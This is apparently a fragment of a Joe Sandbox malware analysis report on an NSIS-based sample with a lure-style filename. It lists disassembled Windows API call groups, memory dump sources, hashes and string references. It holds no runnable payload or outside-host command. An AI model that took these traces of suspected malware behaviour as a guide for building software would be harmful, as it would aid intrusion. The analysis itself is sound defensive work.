                                                                        • Associated: 00000000.00000002.2078459290.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078765137.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_Image_Product_Inquiry_Request_Villoslada.jbxd
                                                                        Similarity
                                                                        • API ID: Global$AllocFree$CloseDeleteFileHandle
                                                                        • String ID:
                                                                        • API String ID: 2667972263-0
                                                                        • Opcode ID: fd7dbd5d37358c1cc163e2b69e48bc419add7a24fb657e083e5c8dbb9c2d7a53
                                                                        • Instruction ID: ed14628ef15dceb457173a83ab12e15034626edc11f01d0ebe9f464a1ada349c
                                                                        • Opcode Fuzzy Hash: fd7dbd5d37358c1cc163e2b69e48bc419add7a24fb657e083e5c8dbb9c2d7a53
                                                                        • Instruction Fuzzy Hash: A821C171800128BBCF216FA5DE49D9F7E79EF05364F20023AF564762E1CB794D419BA8
                                                                        APIs
                                                                        • RegEnumValueW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,?,00100020,?,?,?), ref: 00402E95
                                                                        • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402EE1
                                                                        • RegCloseKey.ADVAPI32(?,?,?), ref: 00402EEA
                                                                        • RegDeleteKeyW.ADVAPI32(?,?), ref: 00402F01
                                                                        • RegCloseKey.ADVAPI32(?,?,?), ref: 00402F0C
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2078423542.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2078405508.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078442214.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078765137.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_Image_Product_Inquiry_Request_Villoslada.jbxd
                                                                        Similarity
                                                                        • API ID: CloseEnum$DeleteValue
                                                                        • String ID:
                                                                        • API String ID: 1354259210-0
                                                                        • Opcode ID: 0ef7066dde05a2ca5f9e50454b412eec226e379908bdbcc4328f96335d0522a1
                                                                        • Instruction ID: 0e68a9e52e1d6489b1d96d2929a27e43e5cdd4abb6d38d1bd7d6776dab24ddff
                                                                        • Opcode Fuzzy Hash: 0ef7066dde05a2ca5f9e50454b412eec226e379908bdbcc4328f96335d0522a1
                                                                        • Instruction Fuzzy Hash: 62215A71500109BBDF129F90CE89EEF7A7DEB54348F110076B905B11A0E7B48E54AAA8
                                                                        APIs
                                                                        • GetDlgItem.USER32(?,?), ref: 00401D9A
                                                                        • GetClientRect.USER32(?,?), ref: 00401DE5
                                                                        • LoadImageW.USER32(?,?,?,?,?,?), ref: 00401E15
                                                                        • SendMessageW.USER32(?,00000172,?,00000000), ref: 00401E29
                                                                        • DeleteObject.GDI32(00000000), ref: 00401E39
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2078423542.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2078405508.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078442214.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078765137.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_Image_Product_Inquiry_Request_Villoslada.jbxd
                                                                        Similarity
                                                                        • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                        • String ID:
                                                                        • API String ID: 1849352358-0
                                                                        • Opcode ID: 78de8004f446787f372156ede0f2d89c690e9876039cb0b07cc28f686e634743
                                                                        • Instruction ID: 4c6ae9b1abf83e60acb3738700a7a9d8e0f5f354904a09afb896d410ef8a521a
                                                                        • Opcode Fuzzy Hash: 78de8004f446787f372156ede0f2d89c690e9876039cb0b07cc28f686e634743
                                                                        • Instruction Fuzzy Hash: CE212672A00119AFCB05CFA4DE45AEEBBB5EF08304F14003AF945F62A0CB389D51DB98
                                                                        APIs
                                                                        • GetDC.USER32(?), ref: 00401E51
                                                                        • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401E6B
                                                                        • MulDiv.KERNEL32(00000000,00000000), ref: 00401E73
                                                                        • ReleaseDC.USER32(?,00000000), ref: 00401E84
                                                                        • CreateFontIndirectW.GDI32(0040CDC8), ref: 00401ED3
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2078423542.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2078405508.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078442214.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078765137.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_Image_Product_Inquiry_Request_Villoslada.jbxd
                                                                        Similarity
                                                                        • API ID: CapsCreateDeviceFontIndirectRelease
                                                                        • String ID:
                                                                        • API String ID: 3808545654-0
                                                                        • Opcode ID: a771a12b6b1f9eb28fc4aa732c56658ca34c83768ad7333c3b90bf9ccbdf4b02
                                                                        • Instruction ID: b60ccfaacb74251373a9760c042081773c0d6d705e51916df09e3ce9171beb14
                                                                        • Opcode Fuzzy Hash: a771a12b6b1f9eb28fc4aa732c56658ca34c83768ad7333c3b90bf9ccbdf4b02
                                                                        • Instruction Fuzzy Hash: 2701D871950650EFEB006BB4AE89BDA3FB0AF55301F10493AF141B71E2C6B90404DB3D
                                                                        APIs
                                                                        • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401CB3
                                                                        • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401CCB
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2078423542.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2078405508.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078442214.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078765137.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_Image_Product_Inquiry_Request_Villoslada.jbxd
                                                                        Similarity
                                                                        • API ID: MessageSend$Timeout
                                                                        • String ID: !
                                                                        • API String ID: 1777923405-2657877971
                                                                        • Opcode ID: 85a27d883e9730f87e0fcbf2f18326d15f90d0f3bc73a62618d738046c98a18f
                                                                        • Instruction ID: dd4700ba4ce2c01fdcac70281bc34cd4026078c78447772ebe71ed50cab348e7
                                                                        • Opcode Fuzzy Hash: 85a27d883e9730f87e0fcbf2f18326d15f90d0f3bc73a62618d738046c98a18f
                                                                        • Instruction Fuzzy Hash: 3C21AD7195420AAEEF05AFB4D94AAAE7BB0EF44304F10453EF601B61D1D7B84941CBA8
                                                                        APIs
                                                                        • lstrlenW.KERNEL32(00423708,00423708,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404C7F
                                                                        • wsprintfW.USER32 ref: 00404C88
                                                                        • SetDlgItemTextW.USER32(?,00423708), ref: 00404C9B
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2078423542.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2078405508.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078442214.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078765137.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_Image_Product_Inquiry_Request_Villoslada.jbxd
                                                                        Similarity
                                                                        • API ID: ItemTextlstrlenwsprintf
                                                                        • String ID: %u.%u%s%s
                                                                        • API String ID: 3540041739-3551169577
                                                                        • Opcode ID: 834fd4594fd84455a21b844807ea957d96961a2cd877ff6e353b70df3a826163
                                                                        • Instruction ID: 7c0a82a5d8c5e130c70e624adf1be80dcdc0ad06cf4f4d66f209f919317c7709
                                                                        • Opcode Fuzzy Hash: 834fd4594fd84455a21b844807ea957d96961a2cd877ff6e353b70df3a826163
                                                                        • Instruction Fuzzy Hash: 9B11D5736041283BEB00666D9C45EDE3298DBC5334F264237FA26F61D1E978CC2286E8
                                                                        APIs
                                                                        • lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,0040347C,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004036D9,?,00000007,00000009,0000000B), ref: 00405CB6
                                                                        • CharPrevW.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,0040347C,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004036D9,?,00000007,00000009,0000000B), ref: 00405CC0
                                                                        • lstrcatW.KERNEL32(?,0040A014,?,00000007,00000009,0000000B), ref: 00405CD2
                                                                        Strings
                                                                        • C:\Users\user\AppData\Local\Temp\, xrefs: 00405CB0
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2078423542.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2078405508.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078442214.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078765137.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_Image_Product_Inquiry_Request_Villoslada.jbxd
                                                                        Similarity
                                                                        • API ID: CharPrevlstrcatlstrlen
                                                                        • String ID: C:\Users\user\AppData\Local\Temp\
                                                                        • API String ID: 2659869361-823278215
                                                                        • Opcode ID: bed06d4f6a82b163f62297ef23baf12e7c7e8c5859eb2f34a161a285e0ec4316
                                                                        • Instruction ID: ab420094dca872cde134391ad8eb9d2612fe0bdf2854729f0df44d947378a899
                                                                        • Opcode Fuzzy Hash: bed06d4f6a82b163f62297ef23baf12e7c7e8c5859eb2f34a161a285e0ec4316
                                                                        • Instruction Fuzzy Hash: 0FD0A771101A30AAC1116B499D04DEF72ACEE85304741003FF641B30A0CB7C5D5297FD
                                                                        APIs
                                                                        • DestroyWindow.USER32(00000000,00000000,0040318F,00000001,?,00000007,00000009,0000000B), ref: 00402FC4
                                                                        • GetTickCount.KERNEL32 ref: 00402FE2
                                                                        • CreateDialogParamW.USER32(0000006F,00000000,00402F2B,00000000), ref: 00402FFF
                                                                        • ShowWindow.USER32(00000000,00000005,?,00000007,00000009,0000000B), ref: 0040300D
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2078423542.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2078405508.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078442214.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078765137.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_Image_Product_Inquiry_Request_Villoslada.jbxd
                                                                        Similarity
                                                                        • API ID: Window$CountCreateDestroyDialogParamShowTick
                                                                        • String ID:
                                                                        • API String ID: 2102729457-0
                                                                        • Opcode ID: eb8a77809652c3cac4ec89cd0a4f321326171d75a79424ed64d57ab8b532068a
                                                                        • Instruction ID: cb146776896af08e1a0fdef995d2a06b2a54ad4518ff1494983f568d8b9f1051
                                                                        • Opcode Fuzzy Hash: eb8a77809652c3cac4ec89cd0a4f321326171d75a79424ed64d57ab8b532068a
                                                                        • Instruction Fuzzy Hash: 52F05E31606621EBC6716F10FE0CA8B7BA5FB44B42B52487AF441B11E5D7B608829BAD
                                                                        APIs
                                                                          • Part of subcall function 004063DB: lstrcpynW.KERNEL32(?,?,00000400,00403560,00429220,NSIS Error,?,00000007,00000009,0000000B), ref: 004063E8
                                                                          • Part of subcall function 00405D5B: CharNextW.USER32(?,?,00425F10,?,00405DCF,00425F10,00425F10,75923420,?,C:\Users\user\AppData\Local\Temp\,00405B0D,?,75923420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405D69
                                                                          • Part of subcall function 00405D5B: CharNextW.USER32(00000000), ref: 00405D6E
                                                                          • Part of subcall function 00405D5B: CharNextW.USER32(00000000), ref: 00405D86
                                                                        • lstrlenW.KERNEL32(00425F10,00000000,00425F10,00425F10,75923420,?,C:\Users\user\AppData\Local\Temp\,00405B0D,?,75923420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405E11
                                                                        • GetFileAttributesW.KERNEL32(00425F10,00425F10,00425F10,00425F10,00425F10,00425F10,00000000,00425F10,00425F10,75923420,?,C:\Users\user\AppData\Local\Temp\,00405B0D,?,75923420,C:\Users\user\AppData\Local\Temp\), ref: 00405E21
                                                                        Strings
                                                                        • C:\Users\user\AppData\Local\Temp\, xrefs: 00405DB8
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2078423542.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2078405508.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078442214.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078765137.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_Image_Product_Inquiry_Request_Villoslada.jbxd
                                                                        Similarity
                                                                        • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                                                        • String ID: C:\Users\user\AppData\Local\Temp\
                                                                        • API String ID: 3248276644-823278215
                                                                        • Opcode ID: f78802c74069857e26c972368cced64b80d0155069d2bb9ab6be860a9edbe6e7
                                                                        • Instruction ID: 2671ab18330f60560c3719f84a1496f0714d5bb9fce48f62cd6cce0e1185a57b
                                                                        • Opcode Fuzzy Hash: f78802c74069857e26c972368cced64b80d0155069d2bb9ab6be860a9edbe6e7
                                                                        • Instruction Fuzzy Hash: FAF0F935108E6156D621333A6D0D6AF2504CE82364756853FFC52B12D5DF3C89539DBE
                                                                        APIs
                                                                        • IsWindowVisible.USER32(?), ref: 004053E6
                                                                        • CallWindowProcW.USER32(?,?,?,?), ref: 00405437
                                                                          • Part of subcall function 0040437D: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 0040438F
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2078423542.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2078405508.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078442214.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078765137.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_Image_Product_Inquiry_Request_Villoslada.jbxd
                                                                        Similarity
                                                                        • API ID: Window$CallMessageProcSendVisible
                                                                        • String ID:
                                                                        • API String ID: 3748168415-3916222277
                                                                        • Opcode ID: c5cb8f23af6b896a3e8b7c90a0bf6a7c51e0247c130c34a679b5b1bbff870e58
                                                                        • Instruction ID: da482bbf0ee2bc432bcdf1377e528ba943c285c76ef4d04d2afca056141c401e
                                                                        • Opcode Fuzzy Hash: c5cb8f23af6b896a3e8b7c90a0bf6a7c51e0247c130c34a679b5b1bbff870e58
                                                                        • Instruction Fuzzy Hash: 4E01B131200608ABDF314F11ED81B9B3629EB84752F608037FA01752D1C7798DD29E69
                                                                        APIs
                                                                        • FreeLibrary.KERNEL32(?,75923420,00000000,C:\Users\user\AppData\Local\Temp\,004039ED,00403803,00000007,?,00000007,00000009,0000000B), ref: 00403A2F
                                                                        • GlobalFree.KERNEL32(?), ref: 00403A36
                                                                        Strings
                                                                        • C:\Users\user\AppData\Local\Temp\, xrefs: 00403A15
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2078423542.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2078405508.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078442214.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078765137.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_Image_Product_Inquiry_Request_Villoslada.jbxd
                                                                        Similarity
                                                                        • API ID: Free$GlobalLibrary
                                                                        • String ID: C:\Users\user\AppData\Local\Temp\
                                                                        • API String ID: 1100898210-823278215
                                                                        • Opcode ID: 942278ec9c7e8339a206e332dc723704b636a129dd5b4a9861660f1353137a24
                                                                        • Instruction ID: e31a7033e06264a748858091d27326a34299cb79b9d6c3cb96cb008d14d5ef43
                                                                        • Opcode Fuzzy Hash: 942278ec9c7e8339a206e332dc723704b636a129dd5b4a9861660f1353137a24
                                                                        • Instruction Fuzzy Hash: 53E0EC36A511205BC7219F45AA0875E7BADAF58B22F05012AE8857B27087745C824F98
                                                                        APIs
                                                                        • lstrlenW.KERNEL32(00438800,C:\Users\user\Desktop,00403081,C:\Users\user\Desktop,C:\Users\user\Desktop,00438800,00438800,80000000,00000003,?,00000007,00000009,0000000B), ref: 00405D02
                                                                        • CharPrevW.USER32(00438800,00000000,00438800,C:\Users\user\Desktop,00403081,C:\Users\user\Desktop,C:\Users\user\Desktop,00438800,00438800,80000000,00000003,?,00000007,00000009,0000000B), ref: 00405D12
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2078423542.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
